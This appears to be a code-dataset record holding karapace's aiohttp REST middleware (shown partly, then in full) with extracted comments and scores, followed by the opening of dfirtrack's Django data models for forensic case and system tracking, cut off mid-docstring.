OPTIONS, POST, PUT", "Access-Control-Allow-Headers": "Authorization, Content-Type", "Server": SERVER_NAME, } def check_rest_headers(self, request: HTTPRequest): # pylint: disable=R1710 method = request.method default_content = "application/vnd.kafka.json.v2+json" default_accept = "*/*" result = {"content_type": default_content} content_matcher = REST_CONTENT_TYPE_RE.search( cgi.parse_header(request.get_header("Content-Type", default_content))[0] ) accept_matcher = REST_ACCEPT_RE.search(cgi.parse_header(request.get_header("Accept", default_accept))[0]) if method in {"POST", "PUT"}: if not content_matcher: http_error("HTTP 415 Unsupported Media Type", result["content_type"], 415) if content_matcher and accept_matcher: header_info = content_matcher.groupdict() header_info["embedded_format"] = header_info.get("embedded_format") or "binary" result["requests"] = header_info result["accepts"] = accept_matcher.groupdict() return result self.log.error("Not acceptable: %r", request.get_header("accept")) http_error("HTTP 406 Not Acceptable", result["content_type"], 406) def check_schema_headers(self, request: HTTPRequest): method = request.method response_default_content_type = "application/vnd.schemaregistry.v1+json" if method in {"POST", "PUT"} and cgi.parse_header(request.get_header("Content-Type"))[0] not in SCHEMA_CONTENT_TYPES: http_error("HTTP 415 Unsupported Media Type", response_default_content_type, 415) accept_val = request.get_header("Accept") if accept_val: if accept_val == "*/*" or accept_val.startswith("*/"): return response_default_content_type content_type_match = get_best_match(accept_val, SCHEMA_ACCEPT_VALUES) if not content_type_match: self.log.debug("Unexpected Accept value: %r", accept_val) http_error("HTTP 406 Not Acceptable", response_default_content_type, 406) return content_type_match return response_default_content_type async def _handle_request( self, *, request, path_for_stats, callback, schema_request=False, callback_with_request=False, json_request=False, rest_request=False ): start_time = time.monotonic() resp = None rapu_request = HTTPRequest( headers=request.headers, query=request.query, method=request.method, url=request.url, path_for_stats=path_for_stats, ) try: if request.method == "OPTIONS": origin = request.headers.get("Origin") if not origin: raise HTTPResponse(body="OPTIONS missing Origin", status=400) headers = self.cors_and_server_headers_for_request(request=rapu_request, origin=origin) raise HTTPResponse(body=b"", status=200, headers=headers) body = await request.read() if json_request: if not body: raise HTTPResponse(body="Missing request JSON body", status=400) try: _, options = cgi.parse_header(rapu_request.get_header("Content-Type")) charset = options.get("charset", "utf-8") body_string = body.decode(charset) rapu_request.json = jsonlib.loads(body_string) except jsonlib.decoder.JSONDecodeError: raise HTTPResponse(body="Invalid request JSON body", status=400) except UnicodeDecodeError: raise HTTPResponse(body=f"Request body is not valid {charset}", status=400) except LookupError: raise HTTPResponse(body=f"Unknown charset {charset}", status=400) else: if body not in {b"", b"{}"}: raise HTTPResponse(body="No request body allowed for this operation", status=400) callback_kwargs = dict(request.match_info) if callback_with_request: callback_kwargs["request"] = rapu_request if rest_request: params = self.check_rest_headers(rapu_request) if "requests" in params: rapu_request.content_type = params["requests"] params.pop("requests") if "accepts" in params: rapu_request.accepts = params["accepts"] params.pop("accepts") callback_kwargs.update(params) if schema_request: content_type = self.check_schema_headers(rapu_request) callback_kwargs["content_type"] = content_type try: data = await callback(**callback_kwargs) status = 200 headers = {} except HTTPResponse as ex: data = ex.body status = ex.status headers = ex.headers except: # pylint: disable=bare-except self.log.exception("Internal server error") data = {"error_code": 500, "message": "Internal server error"} status = 500 headers = {} headers.update(self.cors_and_server_headers_for_request(request=rapu_request)) if isinstance(data, (dict, list)): resp_bytes = json_encode(data, binary=True, sort_keys=True, compact=True) elif isinstance(data, str): if "Content-Type" not in headers: headers["Content-Type"] = "text/plain; charset=utf-8" resp_bytes = data.encode("utf-8") else: resp_bytes = data # On 204 - NO CONTENT there is no point of calculating cache headers if 200 >= status <= 299: if resp_bytes: etag = '"{}"'.format(hashlib.md5(resp_bytes).hexdigest()) else: etag = '""' if_none_match = request.headers.get("if-none-match") if if_none_match and if_none_match.replace("W/", "") == etag: status = 304 resp_bytes = b"" headers["access-control-expose-headers"] = "etag" headers["etag"] = etag resp = aiohttp.web.Response(body=resp_bytes, status=status, headers=headers) except HTTPResponse as ex: if isinstance(ex.body, str): resp = aiohttp.web.Response(text=ex.body, status=ex.status, headers=ex.headers) else: resp = aiohttp.web.Response(body=ex.body, status=ex.status, headers=ex.headers) except asyncio.CancelledError: self.log.debug("Client closed connection") raise except Exception as ex: # pylint: disable=broad-except self.stats.unexpected_exception(ex=ex, where="rapu_wrapped_callback") self.log.exception("Unexpected error handling user request: %s %s", request.method, request.url) resp = aiohttp.web.Response(text="Internal Server Error", status=500) finally: self.stats.timing( self.app_request_metric, time.monotonic() - start_time, tags={ "path": path_for_stats, # no `resp` means that we had a failure in exception handler "result": resp.status if resp else 0, "method": request.method, } ) return resp def route(self, path, *, callback, method, schema_request=False, with_request=None, json_body=None, rest_request=False): # pretty path for statsd reporting path_for_stats = re.sub(r"<[\w:]+>", "x", path) # bottle compatible routing aio_route = path aio_route = re.sub(r"<(\w+):path>", r"{\1:.+}", aio_route) aio_route = re.sub(r"<(\w+)>", r"{\1}", aio_route) if (method in {"POST", "PUT"}) and with_request is None: with_request = True if with_request and json_body is None: json_body = True async def wrapped_callback(request): return await self._handle_request( request=request, path_for_stats=path_for_stats, callback=callback, schema_request=schema_request, callback_with_request=with_request, json_request=json_body, rest_request=rest_request ) async def wrapped_cors(request): return await self._handle_request( request=request, path_for_stats=path_for_stats, callback=None, ) if not aio_route.endswith("/"): self.app.router.add_route(method, aio_route + "/", wrapped_callback) self.app.router.add_route(method, aio_route, wrapped_callback) else: self.app.router.add_route(method, aio_route, wrapped_callback) self.app.router.add_route(method, aio_route[:-1], wrapped_callback) try: self.app.router.add_route("OPTIONS", aio_route, wrapped_cors) except RuntimeError as ex: if "Added route will never be executed, method OPTIONS is already registered" not in str(ex): raise async def http_request(self, url, *, method="GET", json=None, timeout=10.0, verify=True, proxy=None): close_session = False if isinstance(verify, str): sslcontext = ssl.create_default_context(cadata=verify) else: sslcontext = None if proxy: connector = aiohttp_socks.SocksConnector( socks_ver=aiohttp_socks.SocksVer.SOCKS5, host=proxy["host"], port=proxy["port"], username=proxy["username"], password=proxy["password"], rdns=False, verify_ssl=verify, ssl_context=sslcontext, ) session = aiohttp.ClientSession(connector=connector) close_session = True elif sslcontext: conn = aiohttp.TCPConnector(ssl_context=sslcontext) session = aiohttp.ClientSession(connector=conn) close_session = True elif verify is True: session = self.http_client_v elif verify is False: session = self.http_client_no_v else: raise ValueError("invalid arguments to http_request") func = getattr(session, method.lower()) try: with async_timeout.timeout(timeout): async with func(url, json=json) as response: if response.headers.get("content-type", "").startswith("application/json"): resp_content = await response.json() else: resp_content = await response.text() result = HTTPResponse(body=resp_content, status=response.status) finally: if close_session: await session.close() return result def run(self, *, host, port): aiohttp.web.run_app( app=self.app, host=host, port=port, access_log_format='%Tfs %{x-client-ip}i "%r" %s "%{user-agent}i" response=%bb request_body=%{content-length}ib', ) def add_routes(self): pass # Override in sub-classes
""" karapace - Custom middleware system on top of `aiohttp` implementing HTTP server and client components for use in Aiven's REST applications. Copyright (c) 2019 Aiven Ltd See LICENSE for details """ from karapace.statsd import StatsClient from karapace.utils import json_encode from karapace.version import __version__ from typing import Dict, Optional from vendor.python_accept_types.accept_types import get_best_match import aiohttp import aiohttp.web import aiohttp_socks import async_timeout import asyncio import cgi import hashlib import json as jsonlib import logging import re import ssl import time SERVER_NAME = "Karapace/{}".format(__version__) SCHEMA_CONTENT_TYPES = [ "application/vnd.schemaregistry.v1+json", "application/vnd.schemaregistry+json", "application/json", "application/octet-stream", ] SCHEMA_ACCEPT_VALUES = [ "application/vnd.schemaregistry.v1+json", "application/vnd.schemaregistry+json", "application/json", ] # TODO -> accept more general values as well REST_CONTENT_TYPE_RE = re.compile( r"application/((vnd\.kafka(\.(?P<embedded_format>avro|json|binary|jsonschema))?(\.(?P<api_version>v[12]))?" r"\+(?P<serialization_format>json))|(?P<general_format>json|octet-stream))" ) REST_ACCEPT_RE = re.compile( r"(application|\*)/((vnd\.kafka(\.(?P<embedded_format>avro|json|binary|jsonschema))?(\.(?P<api_version>v[12]))?\+" r"(?P<serialization_format>json))|(?P<general_format>json|\*))" ) class HTTPRequest: def __init__( self, *, url: str, query, headers: Dict[str, str], path_for_stats: str, method: str, content_type: Optional[str] = None, accepts: Optional[str] = None, ): self.url = url self.headers = headers self._header_cache: Dict[str, Optional[str]] = {} self.query = query self.content_type = content_type self.accepts = accepts self.path_for_stats = path_for_stats self.method = method self.json = None def get_header(self, header: str, default_value: Optional[str] = None) -> Optional[str]: upper_cased = header.upper() if upper_cased in self._header_cache: return self._header_cache[upper_cased] for h in self.headers.keys(): if h.upper() == upper_cased: value = self.headers[h] self._header_cache[upper_cased] = value return value if upper_cased == "CONTENT-TYPE": # sensible default self._header_cache[upper_cased] = "application/json" else: self._header_cache[upper_cased] = default_value return self._header_cache[upper_cased] def __repr__(self): return "HTTPRequest(url=%s query=%s method=%s json=%r)" % (self.url, self.query, self.method, self.json) class HTTPResponse(Exception): """A custom Response object derived from Exception so it can be raised in response handler callbacks.""" def __init__(self, body, *, status: int = 200, content_type: Optional[str] = None, headers: Dict[str, str] = None): self.body = body self.status = status self.headers = dict(headers) if headers else {} if isinstance(body, (dict, list)): self.headers["Content-Type"] = "application/json" self.json = body else: self.json = None if content_type: self.headers["Content-Type"] = content_type super().__init__("HTTPResponse {}".format(status)) def ok(self): if self.status < 200 or self.status >= 300: return False return True def __repr__(self): return f"HTTPResponse(status={self.status} body={self.body})" def http_error(message, content_type, code): raise HTTPResponse( body=json_encode({ "error_code": code, "message": message, }, binary=True), headers={"Content-Type": content_type}, status=code, ) class RestApp: def __init__(self, *, app_name, sentry_config): self.app_name = app_name self.app_request_metric = "{}_request".format(app_name) self.app = aiohttp.web.Application() self.app.on_startup.append(self.create_http_client) self.app.on_cleanup.append(self.cleanup_http_client) self.http_client_v = None self.http_client_no_v = None self.log = logging.getLogger(self.app_name) self.stats = StatsClient(sentry_config=sentry_config) self.raven_client = self.stats.raven_client self.app.on_cleanup.append(self.cleanup_stats_client) async def cleanup_stats_client(self, app): # pylint: disable=unused-argument self.stats.close() async def create_http_client(self, app): # pylint: disable=unused-argument no_v_conn = aiohttp.TCPConnector(ssl=False) self.http_client_no_v = aiohttp.ClientSession(connector=no_v_conn, headers={"User-Agent": SERVER_NAME}) self.http_client_v = aiohttp.ClientSession(headers={"User-Agent": SERVER_NAME}) async def cleanup_http_client(self, app): # pylint: disable=unused-argument if self.http_client_no_v: await self.http_client_no_v.close() if self.http_client_v: await self.http_client_v.close() @staticmethod def cors_and_server_headers_for_request(*, request, origin="*"): # pylint: disable=unused-argument return { "Access-Control-Allow-Origin": origin, "Access-Control-Allow-Methods": "DELETE, GET, OPTIONS, POST, PUT", "Access-Control-Allow-Headers": "Authorization, Content-Type", "Server": SERVER_NAME, } def check_rest_headers(self, request: HTTPRequest): # pylint: disable=R1710 method = request.method default_content = "application/vnd.kafka.json.v2+json" default_accept = "*/*" result = {"content_type": default_content} content_matcher = REST_CONTENT_TYPE_RE.search( cgi.parse_header(request.get_header("Content-Type", default_content))[0] ) accept_matcher = REST_ACCEPT_RE.search(cgi.parse_header(request.get_header("Accept", default_accept))[0]) if method in {"POST", "PUT"}: if not content_matcher: http_error("HTTP 415 Unsupported Media Type", result["content_type"], 415) if content_matcher and accept_matcher: header_info = content_matcher.groupdict() header_info["embedded_format"] = header_info.get("embedded_format") or "binary" result["requests"] = header_info result["accepts"] = accept_matcher.groupdict() return result self.log.error("Not acceptable: %r", request.get_header("accept")) http_error("HTTP 406 Not Acceptable", result["content_type"], 406) def check_schema_headers(self, request: HTTPRequest): method = request.method response_default_content_type = "application/vnd.schemaregistry.v1+json" if method in {"POST", "PUT"} and cgi.parse_header(request.get_header("Content-Type"))[0] not in SCHEMA_CONTENT_TYPES: http_error("HTTP 415 Unsupported Media Type", response_default_content_type, 415) accept_val = request.get_header("Accept") if accept_val: if accept_val == "*/*" or accept_val.startswith("*/"): return response_default_content_type content_type_match = get_best_match(accept_val, SCHEMA_ACCEPT_VALUES) if not content_type_match: self.log.debug("Unexpected Accept value: %r", accept_val) http_error("HTTP 406 Not Acceptable", response_default_content_type, 406) return content_type_match return response_default_content_type async def _handle_request( self, *, request, path_for_stats, callback, schema_request=False, callback_with_request=False, json_request=False, rest_request=False ): start_time = time.monotonic() resp = None rapu_request = HTTPRequest( headers=request.headers, query=request.query, method=request.method, url=request.url, path_for_stats=path_for_stats, ) try: if request.method == "OPTIONS": origin = request.headers.get("Origin") if not origin: raise HTTPResponse(body="OPTIONS missing Origin", status=400) headers = self.cors_and_server_headers_for_request(request=rapu_request, origin=origin) raise HTTPResponse(body=b"", status=200, headers=headers) body = await request.read() if json_request: if not body: raise HTTPResponse(body="Missing request JSON body", status=400) try: _, options = cgi.parse_header(rapu_request.get_header("Content-Type")) charset = options.get("charset", "utf-8") body_string = body.decode(charset) rapu_request.json = jsonlib.loads(body_string) except jsonlib.decoder.JSONDecodeError: raise HTTPResponse(body="Invalid request JSON body", status=400) except UnicodeDecodeError: raise HTTPResponse(body=f"Request body is not valid {charset}", status=400) except LookupError: raise HTTPResponse(body=f"Unknown charset {charset}", status=400) else: if body not in {b"", b"{}"}: raise HTTPResponse(body="No request body allowed for this operation", status=400) callback_kwargs = dict(request.match_info) if callback_with_request: callback_kwargs["request"] = rapu_request if rest_request: params = self.check_rest_headers(rapu_request) if "requests" in params: rapu_request.content_type = params["requests"] params.pop("requests") if "accepts" in params: rapu_request.accepts = params["accepts"] params.pop("accepts") callback_kwargs.update(params) if schema_request: content_type = self.check_schema_headers(rapu_request) callback_kwargs["content_type"] = content_type try: data = await callback(**callback_kwargs) status = 200 headers = {} except HTTPResponse as ex: data = ex.body status = ex.status headers = ex.headers except: # pylint: disable=bare-except self.log.exception("Internal server error") data = {"error_code": 500, "message": "Internal server error"} status = 500 headers = {} headers.update(self.cors_and_server_headers_for_request(request=rapu_request)) if isinstance(data, (dict, list)): resp_bytes = json_encode(data, binary=True, sort_keys=True, compact=True) elif isinstance(data, str): if "Content-Type" not in headers: headers["Content-Type"] = "text/plain; charset=utf-8" resp_bytes = data.encode("utf-8") else: resp_bytes = data # On 204 - NO CONTENT there is no point of calculating cache headers if 200 >= status <= 299: if resp_bytes: etag = '"{}"'.format(hashlib.md5(resp_bytes).hexdigest()) else: etag = '""' if_none_match = request.headers.get("if-none-match") if if_none_match and if_none_match.replace("W/", "") == etag: status = 304 resp_bytes = b"" headers["access-control-expose-headers"] = "etag" headers["etag"] = etag resp = aiohttp.web.Response(body=resp_bytes, status=status, headers=headers) except HTTPResponse as ex: if isinstance(ex.body, str): resp = aiohttp.web.Response(text=ex.body, status=ex.status, headers=ex.headers) else: resp = aiohttp.web.Response(body=ex.body, status=ex.status, headers=ex.headers) except asyncio.CancelledError: self.log.debug("Client closed connection") raise except Exception as ex: # pylint: disable=broad-except self.stats.unexpected_exception(ex=ex, where="rapu_wrapped_callback") self.log.exception("Unexpected error handling user request: %s %s", request.method, request.url) resp = aiohttp.web.Response(text="Internal Server Error", status=500) finally: self.stats.timing( self.app_request_metric, time.monotonic() - start_time, tags={ "path": path_for_stats, # no `resp` means that we had a failure in exception handler "result": resp.status if resp else 0, "method": request.method, } ) return resp def route(self, path, *, callback, method, schema_request=False, with_request=None, json_body=None, rest_request=False): # pretty path for statsd reporting path_for_stats = re.sub(r"<[\w:]+>", "x", path) # bottle compatible routing aio_route = path aio_route = re.sub(r"<(\w+):path>", r"{\1:.+}", aio_route) aio_route = re.sub(r"<(\w+)>", r"{\1}", aio_route) if (method in {"POST", "PUT"}) and with_request is None: with_request = True if with_request and json_body is None: json_body = True async def wrapped_callback(request): return await self._handle_request( request=request, path_for_stats=path_for_stats, callback=callback, schema_request=schema_request, callback_with_request=with_request, json_request=json_body, rest_request=rest_request ) async def wrapped_cors(request): return await self._handle_request( request=request, path_for_stats=path_for_stats, callback=None, ) if not aio_route.endswith("/"): self.app.router.add_route(method, aio_route + "/", wrapped_callback) self.app.router.add_route(method, aio_route, wrapped_callback) else: self.app.router.add_route(method, aio_route, wrapped_callback) self.app.router.add_route(method, aio_route[:-1], wrapped_callback) try: self.app.router.add_route("OPTIONS", aio_route, wrapped_cors) except RuntimeError as ex: if "Added route will never be executed, method OPTIONS is already registered" not in str(ex): raise async def http_request(self, url, *, method="GET", json=None, timeout=10.0, verify=True, proxy=None): close_session = False if isinstance(verify, str): sslcontext = ssl.create_default_context(cadata=verify) else: sslcontext = None if proxy: connector = aiohttp_socks.SocksConnector( socks_ver=aiohttp_socks.SocksVer.SOCKS5, host=proxy["host"], port=proxy["port"], username=proxy["username"], password=proxy["password"], rdns=False, verify_ssl=verify, ssl_context=sslcontext, ) session = aiohttp.ClientSession(connector=connector) close_session = True elif sslcontext: conn = aiohttp.TCPConnector(ssl_context=sslcontext) session = aiohttp.ClientSession(connector=conn) close_session = True elif verify is True: session = self.http_client_v elif verify is False: session = self.http_client_no_v else: raise ValueError("invalid arguments to http_request") func = getattr(session, method.lower()) try: with async_timeout.timeout(timeout): async with func(url, json=json) as response: if response.headers.get("content-type", "").startswith("application/json"): resp_content = await response.json() else: resp_content = await response.text() result = HTTPResponse(body=resp_content, status=response.status) finally: if close_session: await session.close() return result def run(self, *, host, port): aiohttp.web.run_app( app=self.app, host=host, port=port, access_log_format='%Tfs %{x-client-ip}i "%r" %s "%{user-agent}i" response=%bb request_body=%{content-length}ib', ) def add_routes(self): pass # Override in sub-classes
en
0.764651
karapace - Custom middleware system on top of `aiohttp` implementing HTTP server and client components for use in Aiven's REST applications. Copyright (c) 2019 Aiven Ltd See LICENSE for details # TODO -> accept more general values as well # sensible default A custom Response object derived from Exception so it can be raised in response handler callbacks. # pylint: disable=unused-argument # pylint: disable=unused-argument # pylint: disable=unused-argument # pylint: disable=unused-argument # pylint: disable=R1710 # pylint: disable=bare-except # On 204 - NO CONTENT there is no point of calculating cache headers # pylint: disable=broad-except # no `resp` means that we had a failure in exception handler # pretty path for statsd reporting # bottle compatible routing # Override in sub-classes
2.053267
2
dfirtrack_main/models.py
0xflotus/dfirtrack
4
6627943
from django.contrib.auth.models import User from django.db import models import logging from time import strftime # initialize logger stdlogger = logging.getLogger(__name__) class Analysisstatus(models.Model): # primary key analysisstatus_id = models.AutoField(primary_key=True) # main entity information analysisstatus_name = models.CharField(max_length=30, unique=True) analysisstatus_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.analysisstatus_name # define logger def logger(analysisstatus, request_user, log_text): stdlogger.info( request_user + log_text + " analysisstatus_id:" + str(analysisstatus.analysisstatus_id) + "|analysisstatus_name:" + str(analysisstatus.analysisstatus_name) + "|analysisstatus_note:" + str(analysisstatus.analysisstatus_note) ) class Analystmemo(models.Model): # primary key analystmemo_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) # main entity information analystmemo_note = models.TextField() # meta information analystmemo_create_time = models.DateTimeField(auto_now_add=True) analystmemo_modify_time = models.DateTimeField(auto_now=True) analystmemo_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='analystmemo_created_by') analystmemo_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='analystmemo_modified_by') # string representation def __str__(self): return 'Analystmemo %s (%s)' % (str(self.analystmemo_id), self.system) # define logger def logger(analystmemo, request_user, log_text): stdlogger.info( request_user + log_text + " analystmemo_id:" + str(analystmemo.analystmemo_id) + "|system:" + str(analystmemo.system) + "|analystmemo_note:" + str(analystmemo.analystmemo_note) ) class Case(models.Model): # primary key case_id = models.AutoField(primary_key=True) # main entity information case_name = models.CharField(max_length=50, unique=True) case_is_incident = models.BooleanField() # meta information case_create_time = models.DateTimeField(auto_now_add=True) case_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='case_created_by') # string representation def __str__(self): return self.case_name # define logger def logger(case, request_user, log_text): stdlogger.info( request_user + log_text + " case_id:" + str(case.case_id) + "|case_name:" + str(case.case_name) + "|case_is_incident:" + str(case.case_is_incident) ) class Company(models.Model): # primary key company_id = models.AutoField(primary_key=True) # foreign key(s) division = models.ForeignKey('Division', on_delete=models.SET_NULL, blank=True, null=True) # main entity information company_name = models.CharField(max_length=50, unique=True) company_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.company_name # define logger def logger(company, request_user, log_text): stdlogger.info( request_user + log_text + " company_id:" + str(company.company_id) + "|division:" + str(company.division) + "|company_name:" + str(company.company_name) + "|company_note:" + str(company.company_note) ) class Contact(models.Model): # primary key contact_id = models.AutoField(primary_key=True) # main entity information contact_name = models.CharField(max_length=100) contact_phone = models.CharField(max_length=50, blank=True, null=True) contact_email = models.CharField(max_length=100, unique=True) contact_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.contact_name # define logger def logger(contact, request_user, log_text): stdlogger.info( request_user + log_text + " contact_id:" + str(contact.contact_id) + "|contact_name:" + str(contact.contact_name) + "|contact_phone:" + str(contact.contact_phone) + "|contact_email:" + str(contact.contact_email) + "|contact_note:" + str(contact.contact_note) ) class Division(models.Model): # primary key division_id = models.AutoField(primary_key=True) # main entity information division_name = models.CharField(max_length=50, unique=True) division_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.division_name # define logger def logger(division, request_user, log_text): stdlogger.info( request_user + log_text + " division_id:" + str(division.division_id) + "|division_name:" + str(division.division_name) + "|division_note:" + str(division.division_note) ) class Domain(models.Model): # primary key domain_id = models.AutoField(primary_key=True) # main entity information domain_name = models.CharField(max_length=100, unique=True) domain_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.domain_name # define logger def logger(domain, request_user, log_text): stdlogger.info( request_user + log_text + " domain_id:" + str(domain.domain_id) + "|domain_name:" + str(domain.domain_name) + "|domain_note:" + str(domain.domain_note) ) class Entry(models.Model): # primary key entry_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) case = models.ForeignKey('Case', on_delete=models.SET_NULL, blank=True, null=True) # main entity information entry_time = models.DateTimeField() entry_sha1 = models.CharField(max_length=40, blank=True, null=True) entry_date = models.CharField(max_length=10, blank=True, null=True) entry_utc = models.CharField(max_length=8, blank=True, null=True) entry_system = models.CharField(max_length=30, blank=True, null=True) entry_type = models.CharField(max_length=30, blank=True, null=True) entry_content = models.TextField(blank=True, null=True) entry_note = models.TextField(blank=True, null=True) # meta information entry_create_time = models.DateTimeField(auto_now_add=True) entry_modify_time = models.DateTimeField(auto_now=True) entry_api_time = models.DateTimeField(null=True) entry_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='entry_created_by') entry_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='entry_modified_by') # define unique together class Meta: unique_together = ('system', 'entry_sha1') # string representation def __str__(self): return '%s | %s | %s' % (str(self.entry_id), self.system, self.entry_sha1) # define logger def logger(entry, request_user, log_text): stdlogger.info( request_user + log_text + " entry_id:" + str(entry.entry_id) + "|system:" + str(entry.system) + "|entry_sha1:" + str(entry.entry_sha1) + "|entry_note:" + str(entry.entry_note) + "|case:" + str(entry.case) ) class Headline(models.Model): # primary key headline_id = models.AutoField(primary_key=True) # main entity information headline_name = models.CharField(max_length=100, unique=True) # string representation def __str__(self): return self.headline_name # define logger def logger(headline, request_user, log_text): stdlogger.info( request_user + log_text + " headline_id:" + str(headline.headline_id) + "|headline_name:" + str(headline.headline_name) ) class Ip(models.Model): # primary key ip_id = models.AutoField(primary_key=True) # main entity information ip_ip = models.GenericIPAddressField(unique=True) # string representation def __str__(self): return self.ip_ip # define logger def logger(ip, request_user, log_text): stdlogger.info( request_user + log_text + " ip_id:" + str(ip.ip_id) + "|ip_ip:" + str(ip.ip_ip) ) class Location(models.Model): # primary key location_id = models.AutoField(primary_key=True) # main entity information location_name = models.CharField(max_length=50, unique=True) location_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.location_name # define logger def logger(location, request_user, log_text): stdlogger.info( request_user + log_text + " location_id:" + str(location.location_id) + "|location_name:" + str(location.location_name) + "|location_note:" + str(location.location_note) ) class Os(models.Model): # primary key os_id = models.AutoField(primary_key=True) # main entity information os_name = models.CharField(max_length=30, unique=True) # string representation def __str__(self): return self.os_name # define logger def logger(os, request_user, log_text): stdlogger.info( request_user + log_text + " os_id:" + str(os.os_id) + "|os_name:" + str(os.os_name) ) class Osarch(models.Model): # primary key osarch_id = models.AutoField(primary_key=True) # main entity information osarch_name = models.CharField(max_length=10, unique=True) # string representation def __str__(self): return self.osarch_name # define logger def logger(osarch, request_user, log_text): stdlogger.info( request_user + log_text + " osarch_id:" + str(osarch.osarch_id) + "|osarch_name:" + str(osarch.osarch_name) ) class Osimportname(models.Model): # primary key osimportname_id = models.AutoField(primary_key=True) # foreign key(s) os = models.ForeignKey('Os', on_delete=models.CASCADE) # main entity information osimportname_name = models.CharField(max_length=30, unique=True) osimportname_importer = models.CharField(max_length=30) # string representation def __str__(self): return '%s (%s)' % (self.osimportname_name, self.os) # define logger def logger(osimportname, request_user, log_text): stdlogger.info( request_user + log_text + " osimportname_id:" + str(osimportname.osimportname_id) + "|osimportname_name:" + str(osimportname.osimportname_name) + "|osimportname_importer:" + str(osimportname.osimportname_importer) + "|os:" + str(osimportname.os) ) class Reason(models.Model): # primary key reason_id = models.AutoField(primary_key=True) # main entity information reason_name = models.CharField(max_length=30, unique=True) reason_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.reason_name # define logger def logger(reason, request_user, log_text): stdlogger.info( request_user + log_text + " reason_id:" + str(reason.reason_id) + "|reason_name:" + str(reason.reason_name) + "|reason_note:" + str(reason.reason_note) ) class Recommendation(models.Model): # primary key recommendation_id = models.AutoField(primary_key=True) # main entity information recommendation_name = models.CharField(max_length=30, unique=True) recommendation_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.recommendation_name # define logger def logger(recommendation, request_user, log_text): stdlogger.info( request_user + log_text + " recommendation_id:" + str(recommendation.recommendation_id) + "|recommendation_name:" + str(recommendation.recommendation_name) + "|recommendation_note:" + str(recommendation.recommendation_note) ) class Reportitem(models.Model): # primary key reportitem_id = models.AutoField(primary_key=True) # foreign key(s) system = models.ForeignKey('System', on_delete=models.CASCADE) headline = models.ForeignKey('Headline', on_delete=models.PROTECT) # main entity information reportitem_subheadline = models.CharField(max_length=100, blank=True, null=True) reportitem_note = models.TextField() # meta information reportitem_create_time = models.DateTimeField(auto_now_add=True) reportitem_modify_time = models.DateTimeField(auto_now=True) reportitem_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='reportitem_created_by') reportitem_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='reportitem_modified_by') # define unique together class Meta: unique_together = (('system', 'headline', 'reportitem_subheadline'),) # string representation def __str__(self): return '%s | %s | %s' % (self.system, self.headline.headline_name, self.reportitem_subheadline) # define logger def logger(reportitem, request_user, log_text): stdlogger.info( request_user + log_text + " reportitem_id:" + str(reportitem.reportitem_id) + "|system:" + str(reportitem.system) + "|headline:" + str(reportitem.headline) + "|reportitem_subheadline:" + str(reportitem.reportitem_subheadline) + "|reportitem_note:" + str(reportitem.reportitem_note) ) class Serviceprovider(models.Model): # primary key serviceprovider_id = models.AutoField(primary_key=True) # main entity information serviceprovider_name = models.CharField(max_length=50, unique=True) serviceprovider_note = models.TextField(blank=True, null=True) # string representation def __str__(self): return self.serviceprovider_name # define logger def logger(serviceprovider, request_user, log_text): stdlogger.info( request_user + log_text + " serviceprovider_id:" + str(serviceprovider.serviceprovider_id) + "|serviceprovider_name:" + str(serviceprovider.serviceprovider_name) + "|serviceprovider_note:" + str(serviceprovider.serviceprovider_note) ) class System(models.Model): # primary key system_id = models.AutoField(primary_key=True) # foreign key(s) systemstatus = models.ForeignKey('Systemstatus', on_delete=models.PROTECT) analysisstatus = models.ForeignKey('Analysisstatus', on_delete=models.PROTECT, blank=True, null=True) reason = models.ForeignKey('Reason', on_delete=models.PROTECT, blank=True, null=True) recommendation = models.ForeignKey('Recommendation', on_delete=models.PROTECT, blank=True, null=True) systemtype = models.ForeignKey('Systemtype', on_delete=models.PROTECT, blank=True, null=True) ip = models.ManyToManyField('Ip', blank=True) domain = models.ForeignKey('Domain', on_delete=models.PROTECT, blank=True, null=True) os = models.ForeignKey('Os', on_delete=models.PROTECT, blank=True, null=True) osarch = models.ForeignKey('Osarch', on_delete=models.PROTECT, blank=True, null=True) host_system = models.ForeignKey('self', on_delete=models.PROTECT, blank=True, null=True) company = models.ManyToManyField('Company', blank=True) location = models.ForeignKey('Location', on_delete=models.PROTECT, blank=True, null=True) serviceprovider = models.ForeignKey('Serviceprovider', on_delete=models.PROTECT, blank=True, null=True) contact = models.ForeignKey('Contact', on_delete=models.PROTECT, blank=True, null=True) tag = models.ManyToManyField('Tag', blank=True) case = models.ManyToManyField('Case', blank=True) # main entity information system_uuid = models.UUIDField(editable=False, null=True, unique=True) system_name = models.CharField(max_length=50) system_dnssuffix = models.CharField(max_length=50, blank=True, null=True) system_install_time = models.DateTimeField(blank=True, null=True) system_lastbooted_time = models.DateTimeField(blank=True, null=True) system_deprecated_time = models.DateTimeField(blank=True, null=True) system_is_vm = models.NullBooleanField(blank=True, null=True) # meta information system_create_time = models.DateTimeField(auto_now_add=True) system_modify_time = models.DateTimeField() system_api_time = models.DateTimeField(null=True) system_created_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='system_created_by') system_modified_by_user_id = models.ForeignKey(User, on_delete=models.PROTECT, related_name='system_modified_by') # define unique together class Meta: unique_together = ('system_name', 'domain', 'system_install_time') # string representation def __str__(self): if self.system_install_time == None: return '[%s] %s' % (str(self.system_id), self.system_name) else: installtime = self.system_install_time.strftime('%Y-%m-%d') return '[%s] %s (%s)' % (str(self.system_id), self.system_name, installtime) # define logger def logger(system, request_user, log_text): """ ManyToMany-Relationsship don't get the default 'None' string if they are 